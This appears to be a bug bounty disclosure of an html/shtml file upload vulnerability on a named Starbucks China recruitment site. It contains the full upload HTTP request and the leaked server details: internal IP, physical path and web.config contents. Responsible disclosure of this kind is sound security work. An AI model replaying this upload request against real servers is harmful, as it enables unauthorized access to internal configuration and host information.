China - ecjobsdc.starbucks.com.cn html/shtml file upload vulnerability

### 1, Summary During the test, I found ecjobsdc.starbucks.com.cn this site has an upload vulnerability, you can upload html and shtml format files, so you can read the server's intranet IP, the physical address of the website application and read the website web.config file. ###2, Vulnerability scope https://ecjobsdc.starbucks.com.cn ###3, proof of exploit By modifying the suffix of filename, this address can be uploaded to upload html and shtml files, so that you can read the server's intranet IP, the physical address of the website application, and the configuration file of the website. Vulnerability certificate ``` POST /recruitjob/hxpublic_v6/hxinterface6.aspx?_hxcategory=hx_filebox_upload_file HTTP/1.1 Host: ecjobsdc.starbucks.com.cn Connection: close Content-Length: 234 Cache-Control: max-age=0 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryevPInYidBxSvSd06 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 ------WebKitFormBoundaryevPInYidBxSvSd06 Content-Disposition: form-data; name="hxwebfileboxcontrol_upload_file_inputbox"; filename="xxx.shtml" Content-Type: text/html <?php echo 1111;> ------WebKitFormBoundaryevPInYidBxSvSd06-- ``` Successfully read the website's remoteaddr webpathinfo web.config file. ``` DOCUMENT_NAMED:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml SERVER_SOFTWARE :Microsoft-IIS/8.5 SERVER_NAME :ecjobsdc.starbucks.com.cn SERVER_PORT :80 REMOTE_ADDR:10.92.29.50 REMOTE_HOST:10.92.29.50 D:\TrustHX\STBKSERM101\www_app\tempfiles\temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml PATH_INFO:/recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 /recruitjob/tempfiles/temp_uploaded_34afb246-02f1-4cb0-978d-15805c2a05c8.shtml <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <httpRedirect enabled="false" destination="https://ecjobs.starbucks.net" exactDestination="false" /> </system.webServer> </configuration> ``` {F349302} {F349303} ## Impact Phishing attack, remote file reading